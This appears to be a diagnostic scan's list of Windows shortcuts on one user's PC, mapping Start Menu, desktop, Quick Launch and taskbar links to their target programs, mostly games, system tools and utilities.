Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Microsoft .NET Framework 1.1 Wizards.lnk -> C:\Windows\Microsoft.NET\Framework\v1.1.4322\ConfigWizards.exe ( )
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Print Management.lnk -> C:\Windows\System32\printmanagement.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk -> C:\Windows\System32\services.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk -> C:\Windows\System32\msconfig.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Firewall with Advanced Security.lnk -> C:\Windows\System32\WF.msc ()
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk -> C:\Windows\System32\calc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk -> C:\Windows\System32\displayswitch.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\NetworkProjection.lnk -> C:\Windows\System32\NetProj.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk -> C:\Windows\System32\mspaint.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk -> C:\Windows\System32\mstsc.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk -> C:\Windows\System32\SnippingTool.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sound Recorder.lnk -> C:\Windows\System32\SoundRecorder.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk -> C:\Windows\System32\StikyNot.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sync Center.lnk -> C:\Windows\System32\mobsync.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Wordpad.lnk -> C:\Program Files\Windows NT\Accessories\wordpad.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk -> C:\Windows\SysWOW64\Windowspowershell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE (x86).lnk -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell_ISE.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Character Map.lnk -> C:\Windows\System32\charmap.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\dfrgui.lnk -> C:\Windows\System32\dfrgui.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Disk Cleanup.lnk -> C:\Windows\System32\cleanmgr.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Information.lnk -> C:\Windows\System32\msinfo32.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\System Restore.lnk -> C:\Windows\System32\rstrui.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer Reports.lnk -> C:\Windows\System32\migwiz\PostMig.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Windows Easy Transfer.lnk -> C:\Windows\System32\migwiz\migwiz.exe (Microsoft Corporation)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk -> C:\Program Files\7-Zip\7zFM.exe (Igor Pavlov)
Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip Help.lnk -> C:\Program Files\7-Zip\7-zip.chm ()
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk -> C:\Windows\System32\eudcedit.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Public\Desktop\Battlefield 3.lnk -> F:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe (EA Digital Illusions CE AB)
Shortcut: C:\Users\Public\Desktop\BlueStacks.lnk -> F:\Program Files (x86)\BlueStacks\BlueStacks\Client\BlueStacks.exe (BlueStack Systems, Inc.)
Shortcut: C:\Users\Public\Desktop\Crazybump.lnk -> F:\Program Files (x86)\Crazybump\CrazyBump.exe (CrazyBump Software)
Shortcut: C:\Users\Public\Desktop\Fallout 4 Image Viewer.lnk -> C:\Windows\Installer\{200E4E99-8D0E-4575-A401-955C13BB5F0B}\_F543B93C9ED14B5D85B0A101647845F4.exe (Flexera Software LLC)
Shortcut: C:\Users\Public\Desktop\Guitar Pro 6.lnk -> F:\Program Files (x86)\Guitar Pro 6\GuitarPro.exe ()
Shortcut: C:\Users\Public\Desktop\MegaDownloader.lnk -> F:\Program Files\MegaDownloader\MegaDownloader.exe ()
Shortcut: C:\Users\Public\Desktop\Planetbase.lnk -> D:\Games\Planetbase\Planetbase.exe ()
Shortcut: C:\Users\Public\Desktop\Plants vs. Zombies.lnk -> F:\Program Files (x86)\Origin Games\Plants vs. Zombies\PlantsVsZombies.exe ()
Shortcut: C:\Users\Public\Desktop\SD Card Formatter.lnk -> C:\Windows\Installer\{10C16E01-F739-4093-89A7-E570589FA0F6}\NewShortcut11_9F21041712364E7FBB19D6D84D3AFF1D.exe (Flexera Software LLC)
Shortcut: C:\Users\Public\Desktop\Spore.lnk -> F:\Program Files (x86)\Origin Games\Spore\Sporebin\SporeApp.exe (Maxis, a division of Electronic Arts Inc.)
Shortcut: C:\Users\Public\Desktop\Star Wars - The Old Republic.lnk -> F:\Games\Star Wars-The Old Republic\launcher.exe (BioWare)
Shortcut: C:\Users\Sblck\Links\Creative Cloud Files.lnk -> F:\Program Files\Creative Cloud Files ()
Shortcut: C:\Users\Sblck\Links\Desktop F.lnk -> F:\Desktop ()
Shortcut: C:\Users\Sblck\Links\Desktop.lnk -> F:\Desktop\DesktopC ()
Shortcut: C:\Users\Sblck\Links\Downloads.lnk -> D:\Downloads ()
Shortcut: C:\Users\Sblck\Links\HDD 500GB (D) - Shortcut.lnk -> D:\ ()
Shortcut: C:\Users\Sblck\Links\RecentPlaces.lnk -> [::{22877A6D-37A1-461A-91B0-DBDA5AAEBC99}]
Shortcut: C:\Users\Sblck\Links\SSD (C) - Shortcut.lnk -> C:\ ()
Shortcut: C:\Users\Sblck\Desktop\Spyder4Pro 4.5.9.lnk -> F:\Program Files (x86)\Monitor cal\spyder\Spyder4Pro\Spyder4Pro.exe (No File)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Console RAR manual.lnk -> C:\Program Files\WinRAR\Rar.txt ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\What is new in the latest version.lnk -> C:\Program Files\WinRAR\WhatsNew.txt ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR help.lnk -> C:\Program Files\WinRAR\WinRAR.chm ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk -> C:\Program Files\WinRAR\WinRAR.exe (Alexander Roshal)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft\Uplay\Uninstall.lnk -> D:\Programs\Ubisoft Game Launcher\Uninstall.exe (Ubisoft)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft\Uplay\Uplay.lnk -> D:\Programs\Ubisoft Game Launcher\Uplay.exe (Ubisoft)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Play The Klub 17.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_Launcher.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\ReadMe.lnk -> C:\Windows\AppCompat\Programs\tk\TK17_V75_Readme.txt ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Uninstall.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_Uninstall.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Tools\Command Shell Documentation.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\tk17sh\doc ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Tools\TK17 Command Shell.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_Shell.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Tools\TK17 Content Importer.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_ContImport.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Tools\TK17 GameSet Manager.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_GameSetMan.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Tools\TK17 Options Manager.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_OptionsMan.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Klub 17\Tools\TK17 PesEd GUI.lnk -> C:\Windows\AppCompat\Programs\tk\Binaries\TK17_PesEdGUI.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\The Elder Scrolls Online\Uninstall The Elder Scrolls Online.lnk -> F:\Games\SteamLibrary\steamapps\common\Zenimax Online\uninstall\Uninstall The Elder Scrolls Online.exe (No File)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TechPowerUp GPU-Z\TechPowerUp GPU-Z.lnk -> C:\Program Files (x86)\GPU-Z\GPU-Z.exe (techPowerUp (www.techpowerup.com))
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TechPowerUp GPU-Z\Uninstall.lnk -> C:\Program Files (x86)\GPU-Z\uninstall.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Steam.lnk -> C:\Program Files (x86)\Steam\Steam.exe (Valve Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan\Help and HOW-TO.lnk -> F:\Program Files (x86)\SpeedFan\speedfan.chm ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan\Release info.lnk -> F:\Program Files (x86)\SpeedFan\speedfan.txt ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan\SpeedFan.lnk -> F:\Program Files (x86)\SpeedFan\speedfan.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpeedFan\Uninstall SpeedFan.lnk -> F:\Program Files (x86)\SpeedFan\uninstall.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PC Remote\PC Remote Server.lnk -> C:\Program Files (x86)\PC Remote\PC Remote\PCRemote.exe (PC Remote)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner\MSI Afterburner.lnk -> C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner\ReadMe.lnk -> C:\Program Files (x86)\MSI Afterburner\Doc\ReadMe.pdf ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner\Uninstall.lnk -> C:\Program Files (x86)\MSI Afterburner\Uninstall.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner\SDK\MSI Afterburner localization reference.lnk -> C:\Program Files (x86)\MSI Afterburner\SDK\Doc\Localization reference.pdf ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner\SDK\MSI Afterburner skin format reference.lnk -> C:\Program Files (x86)\MSI Afterburner\SDK\Doc\USF skin format reference.pdf ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MSI Afterburner\SDK\Samples.lnk -> C:\Program Files (x86)\MSI Afterburner\SDK\Samples ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader\JDownloader 2 Uninstaller.lnk -> F:\Programs\JDownloader\Uninstall JDownloader.exe (AppWork GmbH)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader\JDownloader 2 Update & Rescue.lnk -> F:\Programs\JDownloader\JDownloader2Update.exe (AppWork GmbH)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader\JDownloader 2.lnk -> F:\Programs\JDownloader\JDownloader2.exe (AppWork GmbH)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12 (64bit).lnk -> C:\Program Files (x86)\Image-Line\FL Studio 12\FL64.exe (Image-Line)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12.lnk -> C:\Program Files (x86)\Image-Line\FL Studio 12\FL.exe (Image-Line)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\IL Download Manager.lnk -> C:\Program Files (x86)\Image-Line\Downloader\ILDownloadManager.exe (Image-Line)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\More....lnk -> C:\Program Files (x86)\Image-Line\Shared\Start ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games\Postal 2.lnk -> [LF6"pH,R GFSI+O(Nkܘ19/Postal 2(1SPSXFL8C&m]
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games\Star Wars® Republic Commando™.lnk -> [LF6"pH,R GFSIv~7A!T3Star Wars Republic Commando"!(1SPSXFL8C&m]
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\F4SE\Fallout 4 (F4SE).lnk -> C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\f4se_loader.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\F4SE\Uninstall.lnk -> C:\Program Files (x86)\Steam\steamapps\common\Fallout 4\f4se_uninstall.exe (No File)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Equalizer APO 1.2\Benchmark.lnk -> C:\Program Files\EqualizerAPO\Benchmark.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Equalizer APO 1.2\Configuration Editor.lnk -> C:\Program Files\EqualizerAPO\Editor.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Equalizer APO 1.2\Configuration reference (online).lnk -> C:\Program Files\EqualizerAPO\Configuration reference (online).url ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Equalizer APO 1.2\Configuration tutorial (online).lnk -> C:\Program Files\EqualizerAPO\Configuration tutorial (online).url ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Equalizer APO 1.2\Configurator.lnk -> C:\Program Files\EqualizerAPO\Configurator.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Equalizer APO 1.2\Uninstall.lnk -> C:\Program Files\EqualizerAPO\Uninstall.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASIO4ALL v2\ASIO4ALL v2 Instruction Manual.lnk -> C:\Program Files (x86)\ASIO4ALL v2\ASIO4ALL v2 Instruction Manual.pdf ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASIO4ALL v2\ASIO4ALL Web Site.lnk -> C:\Program Files (x86)\ASIO4ALL v2\ASIO4ALL Web Site.url ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASIO4ALL v2\Uninstall.lnk -> C:\Program Files (x86)\ASIO4ALL v2\uninstall.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk -> C:\Windows\System32\notepad.exe (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk -> C:\Windows\System32\shell32.dll (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk -> C:\Windows\System32\eudcedit.exe (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk -> C:\Windows\System32\Magnify.exe (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk -> C:\Windows\System32\Narrator.exe (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk -> C:\Windows\System32\osk.exe (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\SendTo\VirusTotal.lnk -> F:\Programs\VirusTotalUploader2\VirusTotalUploader2.2.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Crazybump.lnk -> F:\Program Files (x86)\Crazybump\CrazyBump.exe (CrazyBump Software)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\CyberGhost 6.lnk -> F:\Program Files\CyberGhost 6\CyberGhost.exe (CyberGhost S.A.)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Guitar Pro 6.lnk -> F:\Program Files (x86)\Guitar Pro 6\GuitarPro.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gyazo GIF.lnk -> C:\Program Files (x86)\Gyazo\GyazoGIF.exe (Nota Inc.)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gyazo.lnk -> C:\Program Files (x86)\Gyazo\Gyazowin.exe (Nota Inc.)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\JDownloader 2.lnk -> F:\Programs\JDownloader\JDownloader2.exe (AppWork GmbH)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Opera Browser.lnk -> C:\Program Files\Opera\launcher.exe (Opera Software)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Samsung Magician.lnk -> C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe (Samsung Electronics Co. Ltd.)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk -> C:\Windows\System32\imageres.dll (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Tunngle.lnk -> C:\Program Files (x86)\Tunngle\Tunngle.exe (Tunngle.net GmbH)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Gyazo.lnk -> C:\Program Files (x86)\Gyazo\Gyazowin.exe (Nota Inc.)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\League of Legends.lnk -> D:\Cancro game\LeagueClient.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Nexus Mod Manager.lnk -> C:\Program Files\Nexus Mod Manager\NexusClient.exe (Black Tree Gaming)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\SpeedFan.lnk -> F:\Program Files (x86)\SpeedFan\speedfan.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Steam.lnk -> C:\Program Files (x86)\Steam\Steam.exe (Valve Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\CPU-Z.lnk -> D:\Programs\CPU-Z\cpuz.exe (CPUID)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\GPU-Z - Video card Information Utility.lnk -> D:\Downloads\GPU-Z.2.4.0.exe (techPowerUp (www.techpowerup.com))
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\NVIDIA Inspector.lnk -> D:\Programs\nvidiaInspector\nvidiaInspector.exe (Orbmu2k)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Origin.lnk -> F:\Origin\Origin.exe (Electronic Arts)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\PC Remote Server.lnk -> C:\Program Files (x86)\PC Remote\PC Remote\PCRemote.exe (PC Remote)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\SpeedFan.lnk -> F:\Program Files (x86)\SpeedFan\speedfan.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Tunngle.lnk -> C:\Program Files (x86)\Tunngle\Tunngle.exe (Tunngle.net GmbH)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\WinAuth.lnk -> F:\WinAuth-3.5.1\WinAuth.exe ()
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\f0f3dc0d5ea26480\MATLAB R2017a.lnk -> F:\Program Files\MATLAB\R2017a\bin\matlab.exe (The MathWorks Inc.)
Shortcut: C:\Users\Sblck\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\7e4dca80246863e3\pinned.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation)
Shortcut: C:\Users\Sblck\AppData\Local\Microsoft\Windows\GameExplorer\{FA761C05-7ED9-4137-9E21-13FC5433F8EE}\PlayTasks\0\Play.lnk -> F:\Games\SteamLibrary\steamapps\common\Star Wars Republic Commando\LaunchRC.exe (No File)


ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.DefaultPrograms
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk -> C:\Windows\System32\wuapp.exe (Microsoft Corporation) -> startmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk -> C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) -> /prefetch:1
